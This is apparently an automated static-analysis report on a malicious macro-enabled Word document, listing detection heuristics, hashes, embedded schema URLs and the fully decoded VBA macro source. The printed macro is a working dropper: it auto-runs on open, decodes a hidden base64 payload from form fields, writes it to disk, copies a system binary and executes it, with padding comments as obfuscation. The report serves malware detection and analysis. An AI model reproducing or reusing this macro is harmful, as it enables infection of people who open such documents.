Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0fbed41093fb1c0d…

MALICIOUS

Office (OOXML)

91.8 KB Created: 2021-02-26 09:35:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-06-20
MD5: 79b06a3e2ff80629f52a10848cff8f19 SHA-1: e40e617e721c4547eb2b5367ce3fa01aa6c039e3 SHA-256: 0fbed41093fb1c0dbfe04ca4c804435a7a244eb4cb930e20ead24cfa91e2fc40
190 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim ageGh As New Shell32.Shell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8116 bytes
SHA-256: 959d07bc618ce901ab5046040ed61d358e3b0c84ab100b1a80579964e17bcddb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{2FC0C1AC-9816-4739-846B-7E4600ADED95}{D405FD11-6049-44FB-A7AA-B72C8C8020E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "af13BT"
Sub AutoOpen()
' Peacemaker alexandria
' Relaxing laws sailing
' Singles stumble geraldine
' Archives left-handed ray
' Centered opinion fervor fu
' Inadvertently vessels interactive suggestion
' Ba sardinian disembark inertia roof
Call aSQYNF
End Sub
Sub aSQYNF()
aVbuBC
End Sub
Function aWYEjS(a7VCsF)
aIRpmE = ""
For asRqY = Len(a7VCsF) To 1 Step -1
aIRpmE = aIRpmE & "" & Mid(a7VCsF, asRqY, 1)
Next asRqY
aWYEjS = aIRpmE
End Function
Function aNrKe(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
        b = .nodeTypedValue
End With
aNrKe = StrConv(b, vbUnicode)
End Function

Attribute VB_Name = "aYFZ7m"
Sub awTPSI(aauxYC, aDnjIx)
' Faithless skinny epistolary wallet combative canvas
' Apostasy included webmasters flip og schedules
Set aUOTc = CreateObject("Scripting.FileSystemObject")
Call aUOTc.CopyFile(aauxYC, aDnjIx, 1)
' Simulate iceberg
' Laundress mature driver
End Sub
Sub au5cy(aAyXQP, ax2emH)
' Latino travel parenthesis
' Thrifty pigment rally slip hight
' Achieve
' Emerald notice tinder notoriously
' Skim discovered priority nigeria workshops
' Coalition pads illustrations
' Home-made handhelds sys variegated looked
' Asset stats
' Leeward disembark vitamin dont
' Fatherland
' High-pitched dejection predicated yes
' Watts verona kite
' Infections physique iso
' Lucas
' Disintegration harmful enlistment
' Ae tights
' Epidemics advantage html ron another
' Squad cm malaysia confidant honolulu
' Mantua mesquite revere
' Refutation potato gallon discontinued
' Socket
' Sponsored bewitching corinth delhi
' Ineffectual gage hardcover
' Zone customise campfire
' Recognised andover
' Starred wifi complicity
' Clipping spontaneously middle archives
' Hidden flimsy accepted mills
' Lagging regard cole
' Actuality flemish mario
' Peterborough boding implacable abhorrence
Open aAyXQP For Output As #1
Print #1, ax2emH
' Presidents ppm endow
Close #1
End Sub

Attribute VB_Name = "aaQreB"
Function aMX17(agG1Ix)
' Brittany scsi brew retaliate
' Unco unhappiness thirty-four
' Rochester unconvinced truss dirty going
' Requires ginger alien bother
' Pheasant
' Introduce tangent offhand pregnancy remark finland
' Empirical
' Nn duties tablecloth hobble bewildering fairfield
' Crammed write careful shingles underworld ipaq
End Function
Function aXPSW(a3tZAN)
' Mx ghz pointed
' Politically towers stuck lincolnshire ns
' Jackass fda sentient
' Xerxes thump decorating
' Occurred
' Arbitration effie roman drudgery shaving herbs
' Simple 4to priestly
' Uneven doom nickname ou nj
' Motherhood authorization oman thinkpad
' Crucifixion kernel loans
' Shad talked explained romantic agitating upskirts
' Suspect geologist katrina storey
' Literature tunnel gm loveless
' Referee stitching mental
' Returns
' Hell average metrical
' Criminal presentations adventuress
av35x = Split(aWYEjS(frm.paths.text), "|")
Select Case a3tZAN
Case Is = 0
aXPSW = av35x(0)
Case Is = 1
aXPSW = av35x(1)
Case Is = 2
aXPSW = av35x(2)
Case Is = 3
aXPSW = av35x(3)
End Select
' Gripe dat incubation exasperate
' Tributaries inbox terrier marc
' Alchemists
' Network hyperbole capture passive thirty-seven sm
' Dolls angela
' Null cultivates
' Queue whey macedonia
' Tainted obtrusive sign newbie dissuade handcuffs foggy
' Assign
' Charwoman arran lustful routing
' Quantum substratum frank devastation oasis
' Nipple stack bid both
' Kinship bated proven freelance stadium
' Observant
' Howitzer topsy-turvy destiny linseed
' Ada slush
' Mint restore
' Possession prelude twenty-eighth fluent implacable processed burning
' Relaxation oasis ds rn
' Calm proud
' Thoughtfulness whet bottom ado fermented
' Earth
End Function
Function aasXfQ(aRdcZ, aWrayg)
' Chuck cooperate bounce coroner postage
' Phial anywhere realize sensor
' Out mischance
' Highest pix damn -oid
' Disapprove reinstate aggrandizement inch mephistopheles
' Newer encumber antecedent motherboard
' Refer roadway lustrous
' Archer reduce doggerel
End Function
Sub aVbuBC()
aV0QRu = aXPSW(0)
aAYTn = aXPSW(1)
adsMOp = aXPSW(2)
aYPqc = aXPSW(3)
' Reform describe shorten
' Reinforce setup addressed eclat
' Styles nsw universe
' Conventions contagion
' Brett cyclone
' Mint guide
' Girlfriend picket paper oughtnt
' Concentrate flights
' Versatile johannes
' Declare babble licensed giggling nevermore
' Deafness meters piano
' Evenly ali
' Losing watchword substantial speeches width
' Tgp pertinacity sad solutions
' Consciousness cleave
' Authentic archives abounding purchase butterfly urge
' Vibrate lavender
' Mailto laplace gently clerk
' Imitative
' Steerage
' Mislaid rage achievements cunt
' Flounder
' Especially instantaneously starring interests implicitly origination
' Tincture opus
' Song lip arrival olfactory junk
' Delia celt area
' Designate contacts unemployment
' Games emetic institutional characterized support
awVsJ = aWYEjS(aNrKe(frm.pay.text))
' Chubby mitchell sit
' Transit savoy belt tunes
' Monroe calls progressive
au5cy aV0QRu, awVsJ
' Attempt
' Thereof stubbornly merge
' Settler neck emblazoned
' Nebulous advertise support
' Stampede stiffen giant duality insufferable
' Twist
' Production sambo
' Tension contraband ner adapter countries louse dairy
awTPSI adsMOp, aAYTn
' Sl southwest
' Essex gourd yen ci
' Overdone
' Knee strikes
' Pupils ribald sentient queensland service
' Beatific fund ukraine
' Proceeding fare helps ermine pensions
' Psychological imp leo hockey
' Kernel hepatitis inclusion
' Checkered confronting
' Based crazy terse needed access
' Centered manchu bronze lock fi situated
' Surveillance estranged lo collegiate
' Accepting sixty-five
' Tiles korean mistletoe
' Charon wasp progenitor specification protest
' Maudlin mp ana moreover thor
' Synopsis fertilizer princess uni measurement communal
' Thunder wendy do organisms quotes needs
' Calibration archives radio stefan bound
' Parry septuagint alot acknowledge
' Keeps magnate orientation eating
' Without tropic blazon agile
' Adultery bio kat choleric finding
' Offensive
' Bolting watched assets
' Baize importunity
' Trigonometry circuit
' Fleming saintly minus mc
a1t5nE = Chr(34)
aQ2nH = Trim(aYPqc & "t : " & a1t5nE & aV0QRu & a1t5nE)
' Leisure studied verona
' Discharge stars
' Staple rewards aimed outcomes churchman
' Ergo regina chrome
' Bulletin guidelines disciplinary asceticism
' Trade income casting banter
Dim ageGh As New Shell32.Shell
Call ageGh.ShellExecute(aAYTn, aQ2nH, " ", SW_SHOWNORMAL)
' Plastic deeper
' Second-rate weeks encumber
' Limitation
' Cruise
' Welsh talked
' Gnome truck subservient repeat tp aa
' Enforcement evening loyally
' Recall idol five
' Materialism okay
' Age ol
' Epithet moisture
' Tied
' Showed disdainful estranged circumlocution
' Survivors brewed extirpate
' Dualism
' Gon
' Kentucky anointing pincers hurrah
' Roe
' Fake unattended arizona monetary
' Zimbabwe event amelioration wrathful disappoint
' Flickered merge
' Cocks cod
' Wagon credulous frosted atheism gens frontispiece
' Bags fresher phosphorus standing
' Ab confiscate collaboration almond depraved vastness borax emblematic
' Jose monica
' Mustang obtrude fourth costs dour
' Celebrity scotland analyses leads
' Campbell rear
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: 77154bbabf416b67a741a7967246ed6bf652ba1f9b0be4e3d1ebd4d9dc7aaf4e

Open this report in the interactive analyzer, or submit your own file for analysis.